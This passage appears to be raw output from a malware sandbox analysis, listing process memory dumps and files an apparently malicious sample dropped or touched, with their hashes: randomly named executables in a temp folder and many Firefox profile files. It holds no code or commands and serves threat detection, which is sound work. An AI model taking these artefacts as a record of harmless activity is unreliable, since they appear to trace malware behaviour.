memory/3996-18-0x0000000000CF0000-0x00000000011CC000-memory.dmp

memory/2388-19-0x00000000000C1000-0x00000000000EF000-memory.dmp

memory/2388-20-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/2388-21-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/2388-22-0x00000000000C0000-0x000000000059C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012580001\29af3f6d41.exe

MD5 d124690a731b9f9511d39dda3a5ef3d8
SHA1 26fc68f194903e93db04711c9524c442845b583c
SHA256 47cb2f5b689678b3292f548d7346c6b400dedc6a2b1dde54b2e343b8b5fc2775
SHA512 e936a771891f85dca11f607acaae7780e9b11eb7ae7afcbc6273ce2386f1d9739c2db55b45c5a8fb4de2af84636e7610cfba096d0a26ab7c31d25176dcf22634

memory/2388-38-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/1564-39-0x0000000000780000-0x0000000000C0C000-memory.dmp

memory/2388-40-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/1564-41-0x0000000000781000-0x00000000007A5000-memory.dmp

memory/2388-42-0x00000000000C0000-0x000000000059C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012581001\ef47ac58df.exe

MD5 343a771efad9c921a3abb8d4201f6040
SHA1 b142b17a0dfb82b75071950eba743d0150ad12ff
SHA256 6d08fa0a96bed6936121d80a60807e6682f0e1ce65f4fca2006fffcf109aa85e
SHA512 d0ebd4de115ae62ea6d7aee7e636f767fe8823b09a0beb22bf64805ea4f01034b7b89092fe0083d9bc694fea3fe2d457aeadff49b4a17c81bc099861620c91e2

memory/1056-59-0x0000000000400000-0x00000000008FF000-memory.dmp

memory/1564-58-0x0000000000780000-0x0000000000C0C000-memory.dmp

memory/1452-61-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/1564-62-0x0000000000780000-0x0000000000C0C000-memory.dmp

memory/1452-64-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/1056-65-0x0000000000400000-0x00000000008FF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe

MD5 8746d7ddcd593e7a9a38016b27a6dde0
SHA1 a505737a7bebefbd81d28d729e26187d15ea3aa7
SHA256 159e04da0b72590135477fa37369439acc2dd400ba28af7597ab05f0be906280
SHA512 9d2c4372c85f2f176f5034c4eb54ba1290260b69cd760fb17e7f3a54ecb490290fa033716f2019231c50b321d314e36b5d6003253e176be8d250cbe689e45b52

memory/2388-84-0x00000000000C0000-0x000000000059C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe

MD5 fc6804a55358a117689dab9333fd0ee5
SHA1 bbe4309bc6d99a67ecc0e866907889659d8e7031
SHA256 4decdc379789942364429bbbed02dda060d79e613ed657ca541fd5f37873fd58
SHA512 6a7b08a022cb25bfa0f906ba50a322bf3a7333e28d083d73c848d220789530f6ad31a65c0b7baf062c3cb5be30128a9af0d3fb43ea714f72f7b1b7bcf622271c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\pending_pings\807fa636-520b-44ce-b30e-612a5e7ef2f3

MD5 31ab52bda42a1a02d65565236b8db07b
SHA1 c6d0de7250a26e80173837603f06b3bbeef975ad
SHA256 0c97a211b722d9ada2ef126eab4f2911f8e153806a548f3bb43f0fd54f5fa94d
SHA512 c6062aedfe9125f5d482abd7ca3fdaf63cf10a2f51fc3358e69616876ff09cf105e6cabeb09e0fcfef5d09904d1aef6e933876708db047a1d25d3471ba49cdcf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\pending_pings\19b0b47f-20b7-48b7-9864-cdb6eb2c9bcb

MD5 f15a4d747a9a2227e4bf1802691e4e5d
SHA1 8ffdb93fb77552247f4dc69630f663b8556a510e
SHA256 bb7cb7e0e334bafdb84b4c57819856dd7c0b7f5613e0990424eeada9b6862875
SHA512 fb6b833aad80cbe5aa557d6993fa844f5ec008055d63ad05692f588fa86d31b125553de41a46c5665c4492be05f64e6e6b2168587e4b4eacd73a1cc94bccb798

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\db\data.safe.tmp

MD5 4ac8fe466f4f7dca72298883887c3717
SHA1 3c5762003b04f432004718d29f5a0400a76bca2a
SHA256 0e1448ac2534939058f00b3eab1f1746f060d2412d0d0c505da32f3bd04680d1
SHA512 bf34027560fe5d840993724cacb7247af3c9f1066b31d53c467468d5b27b1b4692cd6810565dc974882d9c8b9ec4b4805e00c789f7e9245f82d5628391be6ff8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\db\data.safe.tmp

MD5 4fa304219cc911c52cd5daf1058d5171
SHA1 781de179bcf8fa7e6c78cfaa08dbafde56440417
SHA256 9bf89717fe255fe9cd736665cad6258f62cc2006873c2260dd755bd4d677cc2d
SHA512 16bdc4a58067d0cc51d1aed10c0d5f144844d852d4bf1ffdda1751112b0022e9a69c1e1770cbadabbc432bcab45cefdac10602834ccd587528c686df3aa2a3f3

memory/5472-307-0x00000000003C0000-0x0000000000668000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\AlternateServices.bin

MD5 bd4710c9dc160698f62cdd8ebec7da40
SHA1 2b850a4c1b5eb28b258e889c41cc34e3753ad311
SHA256 c2d1abf5e98ae828a939a1e448f991519e6892bae6eed1069360e75a311dbb05
SHA512 2130090c8509e6bbdadae95beed42f349705f84cff2e82fa26b2d5c55c44fa2c4e262529a909cfc586c7add5ffae486f1b26f390681d983c022f3d7b5583095c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\activity-stream.discovery_stream.json

MD5 dcee70c49ce4d12c4706854f169f1c8e
SHA1 8d668b899981b08ee7b7d565d42241d04c8b233f
SHA256 0eb505f63a1824ab875c258b868273a499c9e6dac44cc997a63efbb512b25f00
SHA512 1bce8fec6633e37cf95930928e3c6d8df9b31a7c813c86626512cc5ec7fc258f694d89020cb6d59ecbad481205ffe7264b91df60229a77c7269d855230ffb2a5

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs.js

MD5 75a1779c1cb258208b461376b8a91c6c
SHA1 fb4b3e910d03a239a5e9c1405baa4935f1bb5468
SHA256 c07f4599845568bbfd0a256c93058bde5a08be712eb8ad866f4e29d9431e30ab
SHA512 d581534590d79543b00407e8d283f11e0ec8378678ac5caea5f0a3e84580fa6554ef22fe39ef02fe9a63472c9f40aabe1d1b0d14a5a311f80c4ffac622c7e605

memory/5472-401-0x00000000003C0000-0x0000000000668000-memory.dmp

memory/5472-399-0x00000000003C0000-0x0000000000668000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\AlternateServices.bin

MD5 58c67de2223811e19947a71226c5097b
SHA1 d0e3074b849b032a316268885405cf2e8daf8948
SHA256 b39d2b048b2521ea47d307d33d6dfa628a253bc7a288a8befa535daf26bae6fe
SHA512 f9b8b9489e7e2bc56f79e434918fdbb45d75fd6fbefa75d1dc4ca362fa7c24c239b2b9d3b5caf4bd14c2990154eecc3e4b7de0dd61824d5e9127369b0aa20933

memory/1564-457-0x0000000000780000-0x0000000000C0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012584001\1777a95027.exe

MD5 623d073b8d01e00cbb5294ff07fe238a
SHA1 c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775
SHA256 ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca
SHA512 dc1fe9e39173bfd1e2722125b1385cf8c15e2570b65c1d5acb320a70d073d39a1a25f3665a87ccb3b8a0aaf7b7e63edb21e8e3cd4c3ac27e9cda237b54979824

memory/5572-476-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2388-488-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/1564-490-0x0000000000780000-0x0000000000C0C000-memory.dmp

memory/5472-493-0x00000000003C0000-0x0000000000668000-memory.dmp

memory/5472-503-0x00000000003C0000-0x0000000000668000-memory.dmp

memory/5572-504-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/5572-505-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2388-506-0x00000000000C0000-0x000000000059C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\db\data.safe.tmp

MD5 1609d41c6476872b27e40fa16e361ffc
SHA1 7933fc8a8b6c0ba7c445141c0cb976b76eb4c4df
SHA256 5428d86f4f1d7626db07a9a62aa458047d6f477794bf6ec380e280b940016713
SHA512 8c59ecc15264ad91d83c3fd45f4bc2422d9f045e68f4cd0809febdc261cfcec361c0444e7223d9a85f2bd84197dddad4bcddb3c384d6e2d1c2f7d599b3e5905f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs.js

MD5 cfaa972a3e95d63bc91bac76336914e6
SHA1 79d276b3d5522f85bd56da35268a04e3e7655247
SHA256 8de5e46982550bebdaa0b028a46ce9cca0b601ab8c0b5e618aba8fd6297e01e6
SHA512 c1eb9679b60a802eeda3d3454d9428b502e54344ad561b0b108dca115699642a6a1b07d3252f2c4eccc5b5f481265c075ee9a7ffcc7b702d2d47e854b10b758c

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

MD5 424c75b758061e3440c9794ee0eb708e
SHA1 9a2cbc4a0cd1c33d2e90968a7b05918e61a98089
SHA256 797f1759f9812cceb48ccd4fe2c31e6c9c246150af0ab5df86a2cfb795b85f60
SHA512 04b18c8d561096f559c900d272db4a67963959697be3652fbbaaae225e4086a493ac6db4024cefd042f21a14e74abb489c6d9c2c9ce7e679fedbb002974f5286

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs-1.js

MD5 444d1db76128383c0fd236cbf5fe1f4e
SHA1 2e8439aa6e5f58cfa6c4af1d429f2ff9945ae521
SHA256 efe4f1f3d9029cf8aca96fbf3ec7e0d1b909908c5e1064ed508c5d4bed2239d8
SHA512 e7fd4508e912ffc81b45a2ddd8aa53f5df08ed62c3765bb113de4b4c3eeac4b0be9da91a376ef335a8bc2abf6d6f1c4fbcb7c9f73e1173a64db55333f526b2c6

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

memory/5572-745-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2388-782-0x00000000000C0000-0x000000000059C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs-1.js

MD5 86f111811345acca6d941b99c27893b2
SHA1 cb4d7b46b08c2e17f2fa6450e81a62a93f90b1db
SHA256 c09082e12fadac12e312463cf02b5ee122085596a88a63b73fef89bb388c9bf8
SHA512 bd99e2a291f28a80c903f021780bd53faa483e836b23e41d3b5a0f86f367ad4102c6584454e67cf6e01c7bee0054d0d80c36790d6d6e322769882a05726c6a26

memory/5572-1951-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2388-2046-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/5572-2976-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2388-2977-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/5464-2980-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/5464-2981-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/5572-2982-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2388-2983-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/5572-2989-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2388-2991-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/5572-2992-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2388-2993-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/5572-2994-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2388-2995-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/5572-2996-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2388-2997-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/5572-2998-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2388-2999-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/2456-3001-0x00000000000C0000-0x000000000059C000-memory.dmp

memory/5572-3002-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2388-3003-0x00000000000C0000-0x000000000059C000-memory.dmp